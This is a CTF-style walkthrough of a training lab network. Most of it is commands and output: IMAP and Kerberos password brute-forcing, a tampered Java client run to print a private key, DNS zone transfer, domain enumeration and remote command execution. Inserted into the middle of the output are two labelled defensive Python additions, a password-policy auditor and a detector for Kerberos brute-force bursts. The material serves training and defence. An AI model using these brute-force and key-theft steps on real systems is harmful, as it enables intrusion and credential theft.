Lab Pentestit 14 - writeup

blaszczakm.blogspot.com, 4 years ago
  1. Crack password for mail
# cat logins_mail.txt                                                                                                                        
sidorov@test.lab
ivanov@test.lab 
petrov@test.lab 
support@test.lab


hydra -L logins_mail.txt  -P /tmp/1 imap://192.168.101.14 -t 60 -f  -I                                                                             
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-02-12 17:45:04
[DATA] max 44 tasks per 1 server, overall 44 tasks, 44 login tries (l:4/p:11), ~1 try per task
[DATA] attacking imap://192.168.101.14:143/


[ERROR] IMAP LOGIN AUTH : 2 NO [AUTHENTICATIONFAILED] Authentication failed.


[143][imap] host: 192.168.101.14   login: support@test.lab password: PASSWORD
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-02-12 17:45:12


telnet 192.168.101.14 imap                                                         
Connected to 192.168.101.14.
Escape character is '^]'.
*
a1 LOGIN support@test.lab PASSWORD
a1 OK
^]
telnet> quit
Connection closed.






 root@kali  ~/ctf/pentestitlab14  unzip vpn.zip -d vpn                                                                                                                               
Archive:  vpn.zip
 extracting: vpn/user                
  inflating: vpn/vpn.conf            
 root@kali  ~/ctf/pentestitlab14  cd vpn                                                                                                                                               
 root@kali  ~/ctf/pentestitlab14/vpn  ls                                                                                                                                               
user  vpn.conf
 root@kali  ~/ctf/pentestitlab14/vpn           


  1. Connect to new VPN 

root@kali  ~/ctf/pentestitlab14/vpn  openvpn --config vpn.conf                                                                                                                     
Wed Feb 12 18:18:42 2020 WARNING: file 'user' is group or others accessible
Wed Feb 12 18:18:42 2020 OpenVPN 2.4.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Feb 20 2019
Wed Feb 12 18:18:42 2020 library versions: OpenSSL 1.1.1d  10 Sep 2019, LZO 2.10
Wed Feb 12 18:18:42 2020 WARNING: No server certificate verification method has been enabled.  See http://openvpn.net/howto.html#mitm for more info.
Wed Feb 12 18:18:42 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Wed Feb 12 18:18:42 2020 UDP link local (bound): [AF_INET][undef]:1194
Wed Feb 12 18:18:42 2020 UDP link remote: [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:42 2020 TLS: Initial packet from [AF_INET]192.168.101.15:1194, sid=6b57de4a c850dc54
Wed Feb 12 18:18:42 2020 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=1, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 VERIFY OK: depth=0, C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=server, name=EasyRSA, emailAddress=support@test.lab
Wed Feb 12 18:18:42 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Wed Feb 12 18:18:42 2020 [server] Peer Connection Initiated with [AF_INET]192.168.101.15:1194
Wed Feb 12 18:18:43 2020 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
Wed Feb 12 18:18:43 2020 PUSH: Received control message: 'PUSH_REPLY,route 172.16.0.0 255.255.0.0,route 10.11.0.1,topology net30,ifconfig 10.11.0.42 10.11.0.41,peer-id 9,cipher AES-256-GCM'
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: --ifconfig/up options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: route options modified
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: peer-id set
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Wed Feb 12 18:18:43 2020 OPTIONS IMPORT: data channel crypto options modified
Wed Feb 12 18:18:43 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Wed Feb 12 18:18:43 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Wed Feb 12 18:18:43 2020 ROUTE_GATEWAY 192.168.51.1/255.255.255.0 IFACE=eth0 HWADDR=08:00:27:a0:58:f0
Wed Feb 12 18:18:43 2020 TUN/TAP device tun1 opened
Wed Feb 12 18:18:43 2020 TUN/TAP TX queue length set to 100
Wed Feb 12 18:18:43 2020 /sbin/ip link set dev tun1 up mtu 1500
Wed Feb 12 18:18:43 2020 /sbin/ip addr add dev tun1 local 10.11.0.42 peer 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.41
Wed Feb 12 18:18:44 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.41
Wed Feb 12 18:18:44 2020 Initialization Sequence Completed


We have a new subnet: 172.16.0.0/16


  1. Scan 172.16.0.0/16 (masscan, nmap)

nmap -T5 -n -sn 172.16.0.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-13 09:32 CET
Nmap scan report for 172.16.0.11
Host is up (0.071s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 34.57 seconds


Nmap scan report for 172.16.0.20
Host is up (0.052s latency).
Not shown: 850 filtered ports, 139 closed ports
PORT     STATE SERVICE
53/tcp   open domain
88/tcp   open kerberos-sec
135/tcp  open msrpc
139/tcp  open netbios-ssn
389/tcp  open ldap
445/tcp  open microsoft-ds
464/tcp  open kpasswd5
636/tcp  open ldapssl
1024/tcp open  kdm
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl


Nmap scan report for 172.16.0.10
Host is up (0.052s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
53/tcp open  domain


  1. client.jar


 root@kali  ~/ctf/pentestitlab14  java -jar client.jar                                                                                                                              
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
/dev/sda1        15G 2.0G 13G 14% /
 root@kali  ~/ctf/pentestitlab14         


  1. edit client.jar
https://www.talksinfo.com/how-to-edit-class-file-from-a-jar/
jar -xf client.jar




 root@kali  ~/ctf/pentestitlab14/client-jar  cd ..
 root@kali  ~/ctf/pentestitlab14  cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r
 root@kali  ~/ctf/pentestitlab14  cd -
~/ctf/pentestitlab14/client-jar
 root@kali  ~/ctf/pentestitlab14/client-jar  jar uf client.jar lab/test/client/Main.class
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
 root@kali  ~/ctf/pentestitlab14/client-jar  java -jar client.jar





One-liner:


root@kali  ~/ctf/pentestitlab14/client-jar  cd .. && cp /media/sf_E_DRIVE/Downloads/client-jar/ . -r && cd client-jar && jar uf client.jar lab/test/client/Main.class && java -jar client.jar




ldc "ls -al /home/dev/.crt;cat /home/dev/.crt/dev.crt;echo -e "\n\n\n\n"; cat /home/dev/.crt/dev.key;"


drwxr-xr-x 2 root root 4096 Nov 14 18:44 .
drwxr-xr-x 3 dev  dev 4096 Nov 14 18:42 ..
-rw-r--r-- 1 root root 5358 Nov 14 18:43 dev.crt
-rw-r--r-- 1 root root 1705 Nov 14 18:43 dev.key
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 3 (0x3)
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=test CA/name=EasyRSA/emailAddress=support@test.lab
        Validity
            Not Before: Nov 14 07:50:50 2019 GMT
            Not After : Nov 11 07:50:50 2029 GMT
        Subject: C=RU, ST=Moscow, L=Moscow, O=test, OU=test, CN=dev/name=EasyRSA/emailAddress=support@test.lab
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            Netscape Comment: 
                Easy-RSA Generated Certificate
            X509v3 Subject Key Identifier: 
                51:51:D9:D1:8E:E2:36:87:DE:62:E3:98:68:7D:68:DB:E3:AB:35:87
            X509v3 Authority Key Identifier: 
                keyid:61:14:9C:EE:28:7B:A5:2D:69:B6:AB:34:C9:9B:87:73:07:49:20:69
                DirName:/C=RU/ST=Moscow/L=Moscow/O=test/OU=test/CN=test CA/name=EasyRSA/emailAddress=support@test.lab
                serial:F5:C2:6A:50:05:37:8F:F8


            X509v3 Extended Key Usage: 
                TLS Web Client Authentication
            X509v3 Key Usage: 
                Digital Signature
            X509v3 Subject Alternative Name: 
                DNS:dev
    Signature Algorithm: sha256WithRSAEncryption






 root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.crt.172.16.20.2
 root@kali  ~/ctf/pentestitlab14/client-jar  vim dev.key.172.16.20.2
 root@kali  ~/ctf/pentestitlab14/client-jar  chmod 600 dev.key.172.16.20.2
 root@kali  ~/ctf/pentestitlab14/client-jar               


cat /opt/token 
L0* Dws7m|b;ek


  1. 172.16.0.11



    root@kali  ~/ctf/pentestitlab14  curl http://172.16.0.11/token                                                                                                                        
#trfioefjio
 root@kali  ~/ctf/pentestitlab14    


  1. DNS

 root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.20 test.lab.


; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.20 test.lab.
; (1 server found)
;; global options: +cmd
test.lab. 3600 IN SOA ad1.test.lab. hostmaster.test.lab. 1 900 600 86400 3600
; Transfer failed.
 root@kali  ~/ctf/pentestitlab14/client-jar  dig axfr @172.16.0.10 test.lab.


; <<>> DiG 9.11.14-3-Debian <<>> axfr @172.16.0.10 test.lab.
; (1 server found)
;; global options: +cmd
test.lab. 21600 IN SOA test.lab. ns1.test.lab. 117 5 30 21600 60
test.lab. 21600 IN NS ns1.test.lab.
test.lab. 21600 IN NS ns2.test.lab.
test.lab. 21600 IN A 172.16.0.20
test.lab. 21600 IN A 172.16.50.20
_kerberos._tcp.dc._msdcs.test.lab. 21600 IN SRV 0 0 88 test.lab.
_ldap._tcp.dc._msdcs.test.lab. 21600 IN SRV 0 0 389 test.lab.
gc._msdcs.test.lab. 21600 IN A 172.16.50.20
_ldap._tcp.gc._msdcs.test.lab. 21600 IN SRV 0 0 3268 test.lab.
_kerberos._tcp.test.lab. 21600 IN SRV 0 0 88 test.lab.
_kpasswd._tcp.test.lab. 21600 IN SRV 0 0 464 test.lab.
_ldap._tcp.test.lab. 21600 IN SRV 0 0 389 test.lab.
_kerberos._udp.test.lab. 21600 IN SRV 0 0 88 test.lab.
_kpasswd._udp.test.lab. 21600 IN SRV 0 0 464 test.lab.
admin.test.lab. 21600 IN A 172.16.40.3
dc.test.lab. 21600 IN A 172.16.50.20
dc1.test.lab. 21600 IN A 172.16.50.20
dc2.test.lab. 21600 IN A 172.16.0.20
dns.test.lab. 21600 IN A 172.16.0.10
dns.test.lab. 21600 IN A 172.16.50.10
elastic.test.lab. 21600 IN A 172.16.40.6
_ldap._tcp.ForestDnsZones.test.lab. 21600 IN SRV 0 0 389 test.lab.
git.test.lab. 21600 IN A 172.16.0.21
mail.test.lab. 21600 IN A 172.16.50.3
news.test.lab. 21600 IN A 172.16.50.21
ns1.test.lab. 21600 IN A 172.16.50.10
ns2.test.lab. 21600 IN A 172.16.0.10
site.test.lab. 21600 IN A 172.16.50.2
token-SDS34gs93.test.lab. 21600 IN A 127.0.0.1 new token :) (ns)
vpn-1.test.lab. 21600 IN A 172.16.50.11
vpn-2.test.lab. 21600 IN A 172.16.0.11
test.lab. 21600 IN SOA test.lab. ns1.test.lab. 117 5 30 21600 60


  1. DC2


 root@kali  ~/ctf/pentestitlab14  enum4linux 172.16.0.20 -u 'DC2\dev'  -p 'L1(#@ru0euh0if'
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 13 16:26:10 2020


 ========================== 
|    Target Information    |
 ========================== 
Target ........... 172.16.0.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 172.16.0.20    |
 =================================================== 
[+] Got domain/workgroup name: TEST


 =========================================== 
|    Nbtstat Information for 172.16.0.20    |
 =========================================== 
Looking up status of 172.16.0.20
DC2             <00> - M <ACTIVE>  Workstation Service
DC2             <03> - M <ACTIVE>  Messenger Service
DC2             <20> - M <ACTIVE>  File Server Service
TEST            <1c> - <GROUP> M <ACTIVE>  Domain Controllers
TEST            <00> - <GROUP> M <ACTIVE>  Domain/Workgroup Name
__SAMBA__       <00> - <GROUP> M <ACTIVE> <PERMANENT>  Domain/Workgroup Name


MAC Address = 00-00-00-00-00-00


 ==================================== 
|    Session Check on 172.16.0.20    |
 ==================================== 
[+] Server 172.16.0.20 allows sessions using username '', password ''


 ========================================== 
|    Getting domain SID for 172.16.0.20    |
 ========================================== 
Domain Name: TEST
Domain Sid: S-1-5-21-518050695-217262318-2335301019
[+] Host is part of a domain (not a workgroup)


 ===================================== 
|    OS information on 172.16.0.20    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 172.16.0.20 from smbclient: 
[+] Got OS info for 172.16.0.20 from srvinfo:
DC2            Wk Sv PrQ Unx NT SNT Samba 4.5.16-Debian
platform_id     : 500
os version      : 6.1
server type     : 0x809a03


 ============================ 
|    Users on 172.16.0.20    |
 ============================ 
index: 0x1 RID: 0x44f acb: 0x00000010 Account: sidorov Name: Maksim Sidorov Desc: 
index: 0x2 RID: 0x1f4 acb: 0x00000010 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x3 RID: 0x450 acb: 0x00000010 Account: ivanov Name: Ego Ivanov Desc: 
index: 0x4 RID: 0x458 acb: 0x00000010 Account: leonov Name:  Leonov Desc: 
index: 0x5 RID: 0x457 acb: 0x00000010 Account: petrov Name:  Petrov Desc: 
index: 0x6 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: Desc: Key Distribution Center Service Account
index: 0x7 RID: 0x1f5 acb: 0x00000215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x8 RID: 0x452 acb: 0x00000010 Account: token_OWdjwifiw0 Name:  Token Desc: 


user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sidorov] rid:[0x44f]
user:[ivanov] rid:[0x450]
user:[token_OWdjwifiw0] rid:[0x452]
user:[petrov] rid:[0x457]
user:[leonov] rid:[0x458]


 ======================================== 
|    Share Enumeration on 172.16.0.20    |
 ======================================== 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available


[+] Attempting to map shares on 172.16.0.20
//172.16.0.20/netlogon Mapping: DENIED, Listing: N/A
//172.16.0.20/sysvol Mapping: DENIED, Listing: N/A
//172.16.0.20/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*


 =================================================== 
|    Password Policy Information for 172.16.0.20    |
 =================================================== 


[+] Attaching to 172.16.0.20 using a NULL share


[+] Trying protocol 139/SMB...


[+] Found domain(s):


[+] TEST
[+] BUILTIN


[+] Password Info for Domain: TEST


[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes 
[+] Password Complexity Flags: 000000


[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0


[+] Minimum password age: 268 days 2 minutes 
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set


[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 7
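The policy enum4linux pulled over a null session above (minimum length 7, complexity disabled, no lockout threshold) is what leaves online password guessing unthrottled on this domain. As an added example, not from the original post, here is a small Python audit that parses those `[+] Key: value` lines and reports every setting weaker than a baseline; the baseline numbers are assumed, not taken from the page, and the embedded sample re-types the lines shown above.

```python
import re

# Constructed sample input: the password-policy lines enum4linux printed for
# 172.16.0.20 above, re-typed here so the audit runs offline.
SAMPLE_POLICY = """\
[+] Password Info for Domain: TEST
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 268 days 23 hours 59 minutes
[+] Password Complexity Flags: 000000
[+] Domain Password Complex: 0
[+] Minimum password age: 268 days 2 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
"""

# Assumed baseline (not from the page); adjust to the policy you actually enforce.
BASELINE = {
    "min_length": 14,          # characters
    "history": 24,             # remembered passwords
    "max_age_days": 365,       # passwords must expire at least this often
    "lockout_threshold": 10,   # failed attempts allowed before lockout
}

LINE_RE = re.compile(r"^\[\+\]\s+(?P<key>[^:]+):\s*(?P<value>.*?)\s*$")


def parse_policy(text):
    """Turn enum4linux '[+] Key: value' lines into a dict keyed by the label."""
    policy = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            policy[m.group("key").strip()] = m.group("value")
    return policy


def duration_to_days(value):
    """Parse 'N days H hours M minutes' into fractional days; None when unset."""
    if value in ("Not Set", "None", ""):
        return None
    per_unit = {"days": 1.0, "hours": 1 / 24, "minutes": 1 / 1440}
    total = 0.0
    for amount, unit in re.findall(r"(\d+)\s+(days?|hours?|minutes?)", value):
        total += int(amount) * per_unit[unit.rstrip("s") + "s"]
    return total


def audit_policy(policy, baseline=BASELINE):
    """Return (check, observed, why) for every setting weaker than the baseline."""
    findings = []

    min_len = int(policy.get("Minimum password length", "0"))
    if min_len < baseline["min_length"]:
        findings.append(("min_length", min_len, "shorter than baseline"))

    history = int(policy.get("Password history length", "0"))
    if history < baseline["history"]:
        findings.append(("history", history, "too few passwords remembered"))

    # Samba reports DOMAIN_PASSWORD_COMPLEX both as a flag bitfield and as this 0/1 line.
    if policy.get("Domain Password Complex", "0") == "0":
        findings.append(("complexity", "disabled", "no complexity requirement"))

    max_age = duration_to_days(policy.get("Maximum password age", "Not Set"))
    if max_age is None or max_age > baseline["max_age_days"]:
        findings.append(("max_age_days", max_age, "passwords never expire or expire too late"))

    threshold = policy.get("Account Lockout Threshold", "None")
    if threshold == "None" or int(threshold) > baseline["lockout_threshold"]:
        findings.append(("lockout_threshold", threshold,
                         "no lockout, so online password guessing is never throttled"))
    return findings


if __name__ == "__main__":
    for check, observed, why in audit_policy(parse_policy(SAMPLE_POLICY)):
        print(f"FAIL {check}: observed={observed!r} ({why})")
```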


 ============================= 
|    Groups on 172.16.0.20    |
 ============================= 


[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Account Operators] rid:[0x224]
group:[Server Operators] rid:[0x225]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]


[+] Getting builtin group memberships:


[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]


[+] Getting local group memberships:
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Cert Publishers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Read-Only Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\krbtgt
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Controllers
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Schema Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Domain Admins
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Group Policy Creator Owners
Group 'Denied RODC Password Replication Group' (RID: 572) has member: TEST\Enterprise Admins


[+] Getting domain groups:
group:[Enterprise Read-Only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-Only Domain Controllers] rid:[0x209]
group:[DnsUpdateProxy] rid:[0x44e]


[+] Getting domain group memberships:
Group 'Group Policy Creator Owners' (RID: 520) has member: TEST\Administrator
Group 'Schema Admins' (RID: 518) has member: TEST\Administrator
Group 'Domain Admins' (RID: 512) has member: TEST\Administrator
Group 'Enterprise Admins' (RID: 519) has member: TEST\Administrator


 ====================================================================== 
|    Users on 172.16.0.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[I] Found new SID: S-1-5-21-518050695-217262318-2335301019
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-518050695-217262318-2335301019 and logon username '', password ''
S-1-5-21-518050695-217262318-2335301019-500 TEST\Administrator (Local User)
S-1-5-21-518050695-217262318-2335301019-501 TEST\Guest (Local User)
S-1-5-21-518050695-217262318-2335301019-502 TEST\krbtgt (Local User)
S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)
S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)
S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)
S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)
S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 *unknown*\*unknown* (8)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)


 ============================================ 
|    Getting printer info for 172.16.0.20    |
 ============================================ 
No printers returned.


enum4linux complete on Thu Feb 13 16:35:40 2020




 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 18:40:52 >  Using KDC(s):
2020/02/13 18:40:52 >  172.16.0.20:88


2020/02/13 18:41:23 >  [+] VALID LOGIN: sidorov@test.lab:1234qwer
2020/02/13 18:41:26 >  Done! Tested 3277 logins (1 successes) in 34.014 seconds
 root@kali  ~/ctf/pentestitlab14/vpn2  smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer                                                                               
Enter sidorov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available


 root@kali  ~/ctf/pentestitlab14  crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab'  -p 1234qwer -x whoami                                                                   
SMB         172.16.0.20     445 DC2         [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)
SMB         172.16.0.20     445 DC2         [+] TEST\sidorov@test.lab:1234qwer 


 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 19:10:56 >  Using KDC(s):
2020/02/13 19:10:56 >  172.16.0.20:88


2020/02/13 19:12:16 >  [+] VALID LOGIN: petrov@test.lab:P@ssw0rd
2020/02/13 19:12:20 >  Done! Tested 8182 logins (1 successes) in 83.873 seconds


 root@kali  ~/ctf/pentestitlab14  smbclient -L 172.16.0.20 -U 'petrov@test.lab'
Enter petrov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
 root@kali  ~/ctf/pentestitlab14  cme smb 172.16.0.20 -u 'petrov@test.lab'  -p 'P@ssw0rd' -x whoami
CME          172.16.0.20:445 DC2             [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)
CME          172.16.0.20:445 DC2             [+] TEST\petrov@test.lab:P@ssw0rd 
[*] KTHXBYE!
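The two kerbrute runs above each hit the KDC with thousands of wrong passwords for one account in well under two minutes, which is the signature a domain controller's pre-authentication failure log should catch. The following is an added example, not part of the writeup: a small detector run over constructed log lines in a hypothetical key=value export of Windows Security event 4771 (Kerberos pre-authentication failed; failure code 0x18 is KDC_ERR_PREAUTH_FAILED, i.e. a wrong password).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Hypothetical key=value export of event 4771; only the regex is tied to this layout.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) id=4771 user=(?P<user>\S+) ip=(?P<ip>\S+) code=(?P<code>0x[0-9a-f]+)$"
)

def parse_preauth_failures(lines):
    """Yield (timestamp, user, ip) for 4771 events with failure code 0x18 (bad
    password). Other codes, e.g. 0x12 (account disabled/locked), are skipped so a
    lockout storm is not double-counted as guessing."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m and m.group("code") == "0x18":
            yield datetime.fromisoformat(m.group("ts")), m.group("user"), m.group("ip")

def find_preauth_bursts(lines, threshold=20, window_seconds=60):
    """Return {(user, ip): peak} for every (account, source) pair whose largest
    number of bad-password failures inside any window reaches the threshold."""
    window = timedelta(seconds=window_seconds)
    events = defaultdict(list)
    for ts, user, ip in parse_preauth_failures(lines):
        events[(user, ip)].append(ts)
    hits = {}
    for key, stamps in events.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):  # sliding window over sorted timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            hits[key] = peak
    return hits

def build_sample_log():
    """Constructed sample: a kerbrute-style burst (40 bad passwords for sidorov
    from one host in 40 s) plus a few ordinary typos and one locked-out account."""
    base = datetime(2020, 2, 13, 18, 40, 52)
    lines = [f"{(base + timedelta(seconds=i)).isoformat()} id=4771 user=sidorov ip=10.0.0.5 code=0x18"
             for i in range(40)]
    lines += [f"{(base + timedelta(minutes=m)).isoformat()} id=4771 user=petrov ip=10.0.0.9 code=0x18"
              for m in (1, 7, 15)]
    lines.append(f"{base.isoformat()} id=4771 user=ivanov ip=10.0.0.7 code=0x12")
    return lines

if __name__ == "__main__":
    for (user, ip), n in find_preauth_bursts(build_sample_log()).items():
        print(f"ALERT: {n} pre-auth failures for {user} from {ip} within 60 s")
```

The lab's DC is a Samba AD DC, which records authentication failures in its own log format rather than as event 4771; only the regex would need to change for that source.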
